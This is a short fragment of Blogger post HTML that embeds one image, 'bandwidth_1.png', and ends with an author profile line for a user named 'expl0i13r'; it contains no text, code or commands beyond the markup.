<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNIjDcyoH_Sba-JX6GJaziMMmqdwd1S5ZBHCr-RG_rXlSHcx-Ci13E6AUjpuK6dWbqYopJCDFAnXqDeDXjWjcg0uX_SsZ4ZDGCSv78SKkfLeOvhcFtzcahhadfr5wN1MfQ4JgQeWGKZBDw/s1600/bandwidth_1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNIjDcyoH_Sba-JX6GJaziMMmqdwd1S5ZBHCr-RG_rXlSHcx-Ci13E6AUjpuK6dWbqYopJCDFAnXqDeDXjWjcg0uX_SsZ4ZDGCSv78SKkfLeOvhcFtzcahhadfr5wN1MfQ4JgQeWGKZBDw/s400/bandwidth_1.png" width="400" /></a></div>
<br />
<br /></div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0